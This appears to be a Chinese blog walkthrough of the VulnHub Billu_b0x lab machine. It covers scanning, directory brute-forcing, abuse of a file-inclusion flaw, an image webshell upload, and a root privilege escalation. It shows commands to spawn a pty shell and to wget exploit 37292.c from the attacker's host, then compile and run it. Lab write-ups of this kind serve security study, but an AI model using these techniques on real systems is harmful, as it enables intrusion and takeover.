VulnHub靶场之Billu_b0x
emmm,好久没玩靶机实验了,今天玩一下!!
用vm打开靶机,把网络适配改为NAT,然后运行kali和靶机
首先肯定查看kali的ip地址,然后使用nmap命令:nmap -sP 192.168.80.0/24扫描主机
找到了靶机的IP地址,接下来进行端口扫描
nmap命令:nmap -p 1-65535 -sV 192.168.80.129
开放了两个端口!!先不用管22端口,直接访问一下80端口:
进入到主页面得到一句提示sql注入???使用万能密码尝试登录结果失败,,,
只能先放弃,看后续是否没有思路再来继续刚,先信息收集!!
使用dirbuster和dirb两个一起爆破一下目录
dirbuster扫描结果:
Dir found: /cgi-bin/ - 403
File found: /index.php - 200
Dir found: /icons/ - 403
File found: /c.php - 200
File found: /in.php - 200
File found: /show.php - 200
Dir found: /doc/ - 403
File found: /add.php - 200
File found: /test.php - 200
Dir found: /icons/small/ - 403
File found: /head.php - 200
Dir found: /uploaded_images/ - 200
File found: /uploaded_images/c.JPG - 200
File found: /uploaded_images/CaptBarbossa.JPG - 200
File found: /panel.php - 302
File found: /head2.php - 200
Dir found: /server-status/ - 403
dirb扫描结果:
---- Scanning URL: http://192.168.80.129/ ----
+ http://192.168.80.129/add (CODE:200|SIZE:307)
+ http://192.168.80.129/c (CODE:200|SIZE:1)
+ http://192.168.80.129/cgi-bin/ (CODE:403|SIZE:290)
+ http://192.168.80.129/head (CODE:200|SIZE:2793)
==> DIRECTORY: http://192.168.80.129/images/
+ http://192.168.80.129/in (CODE:200|SIZE:47554)
+ http://192.168.80.129/index (CODE:200|SIZE:3267)
+ http://192.168.80.129/panel (CODE:302|SIZE:2469)
==> DIRECTORY: http://192.168.80.129/phpmy/
+ http://192.168.80.129/server-status (CODE:403|SIZE:295)
+ http://192.168.80.129/show (CODE:200|SIZE:1)
+ http://192.168.80.129/test (CODE:200|SIZE:72)
==> DIRECTORY: http://192.168.80.129/uploaded_images/
+ http://192.168.80.129/phpmy/ChangeLog (CODE:200|SIZE:28878)
+ http://192.168.80.129/phpmy/LICENSE (CODE:200|SIZE:18011)
+ http://192.168.80.129/phpmy/README (CODE:200|SIZE:2164)
+ http://192.168.80.129/phpmy/TODO (CODE:200|SIZE:190)
+ http://192.168.80.129/phpmy/changelog (CODE:200|SIZE:8367)
==> DIRECTORY: http://192.168.80.129/phpmy/contrib/
+ http://192.168.80.129/phpmy/docs (CODE:200|SIZE:2781)
+ http://192.168.80.129/phpmy/export (CODE:200|SIZE:8367)
+ http://192.168.80.129/phpmy/favicon (CODE:200|SIZE:18902)
+ http://192.168.80.129/phpmy/favicon.ico (CODE:200|SIZE:18902)
+ http://192.168.80.129/phpmy/import (CODE:200|SIZE:8367)
+ http://192.168.80.129/phpmy/index (CODE:200|SIZE:8367)
==> DIRECTORY: http://192.168.80.129/phpmy/js/
==> DIRECTORY: http://192.168.80.129/phpmy/libraries/
+ http://192.168.80.129/phpmy/license (CODE:200|SIZE:8367)
==> DIRECTORY: http://192.168.80.129/phpmy/locale/
+ http://192.168.80.129/phpmy/main (CODE:200|SIZE:8367)
+ http://192.168.80.129/phpmy/navigation (CODE:200|SIZE:8367)
+ http://192.168.80.129/phpmy/phpinfo (CODE:200|SIZE:8367)
+ http://192.168.80.129/phpmy/phpmyadmin (CODE:200|SIZE:42380)
==> DIRECTORY: http://192.168.80.129/phpmy/pmd/
+ http://192.168.80.129/phpmy/print (CODE:200|SIZE:1064)
+ http://192.168.80.129/phpmy/robots (CODE:200|SIZE:26)
+ http://192.168.80.129/phpmy/robots.txt (CODE:200|SIZE:26)
==> DIRECTORY: http://192.168.80.129/phpmy/scripts/
==> DIRECTORY: http://192.168.80.129/phpmy/setup/
+ http://192.168.80.129/phpmy/sql (CODE:200|SIZE:8367)
==> DIRECTORY: http://192.168.80.129/phpmy/themes/
+ http://192.168.80.129/phpmy/url (CODE:200|SIZE:8367)
+ http://192.168.80.129/phpmy/webapp (CODE:200|SIZE:6917)
+ http://192.168.80.129/phpmy/setup/config (CODE:303|SIZE:0)
==> DIRECTORY: http://192.168.80.129/phpmy/setup/frames/
+ http://192.168.80.129/phpmy/setup/index (CODE:200|SIZE:12970)
==> DIRECTORY: http://192.168.80.129/phpmy/setup/lib/
+ http://192.168.80.129/phpmy/setup/scripts (CODE:200|SIZE:5169)
+ http://192.168.80.129/phpmy/setup/styles (CODE:200|SIZE:6941)
+ http://192.168.80.129/phpmy/setup/validate (CODE:200|SIZE:10)
-----------------
END_TIME: Mon Nov 11 04:50:43 2019
发现存在很多可疑的目录!
先访问一下phpmy目录,看是不是phpmyadmin页面:
果然是,先放一边,再逐一进行访问页面,先访问c.php,空白页面
访问in.php,发现是phpinfo,而且好像还有文件包含漏洞:
show.php什么都没有,空白页面,add.php好像是一个文件上传的页面:
访问一下test.php得到了一个提示!!!
file参数???这不是刚好和刚才那文件包含漏洞相吻合??传递get参数,不行,,猜测是post,成功:
好的,那么就可以利用一下这个文件包含漏洞来查看其他文件的内容了
c.php、show.php、in.php、index.php、add.php、head.php、panel.php
想到还有个phpmyadmin页面,首先先读取一下phpmyadmin的配置文件,看看能否找到登陆的账号和密码:
类似账号密码,还是root的?尝试登录phpmyadmin,失败,试试ssh连接一下,毕竟是root
没想到直接登陆成功,,,,:
实验完成????还是继续玩下走吧,,,phpmyadmin还没登陆成功呢
查看show.php的时候发现,好像是数据库查询??:
查看一下c.php,发现一个用户名密码,先记下来billu\b0x_billu
等查看完页面再去尝试一下是否为phpmyadmin的账号密码,免得麻烦:
add.php就是一个静态的页面,根本没有上传的功能,,,,
panel.php好像就是首页登陆成功之后进入的页面,先放一边:
还有两个head页面都是显示图片,,看完之后了解到了不少的信息
主要的还是关于c.php页面中的用户名和密码,尝试是否是phpmyadmin的登录密码
直接去尝试一下,登陆成功:
经过简单收集,找到了一个用户名密码biLLu\hEx_it:
回想到我们当初刚进入页面时是需要登录的,猜测这就是登录账号和密码,去尝试登录,成功:
发现在增加用户的页面有一个上传地方!!
先去看看源码的上传代码,发现存在漏洞:
看着源码我们就知道了,可以上传一个图片马,然后利用文件包含!!
文件头绕过,在后面加上一句话木马:
成功执行:
这就好办了,能执行php代码的图片,不就和上一个靶场差不多吗??
直接phpshell脚本一波!
得到shell:
使用python获取标准shell:python -c 'import pty; pty.spawn("/bin/bash")'
查看一下内核:
emmmm,又是ubuntu还是14年的,,继续脏牛提权??
结果发现脏牛不行,,,,虚拟机直接崩溃??还是我等的时间不够长??算了换一种吧
使用cat /etc/issue查看版本号:
直接查找exp:
该目录下不能创建文件,切换到/tmp下,kali开启服务,并移动文件到网站根目录下:
vim /etc/apache2/ports.conf
/etc/init.d/apache2 start
cp /usr/share/exploitdb/exploits/linux/local/37292.c /var/www/html
下载文件:wget 192.168.80.128:8888/37292.c
编译执行文件:
gcc -pthread 37292.c -o 37292 -lcrypt
./37292
成功拿到root权限,实验完成!!与我们之前ssh连接的一模一样,,,,
貌似没有flag,再见~~
总结
这个实验总的来说与上一个实验差不多,文件包含,然后反弹shell
最重要的是知道了提权要换方法,不能一条路走到死,提权的时候脏牛不行
就应该想到其他方法,比如说直接找Ubuntu的漏洞利用!!
恩恩,这个实验也收获颇多~~望以后继续努力!!!!加油!
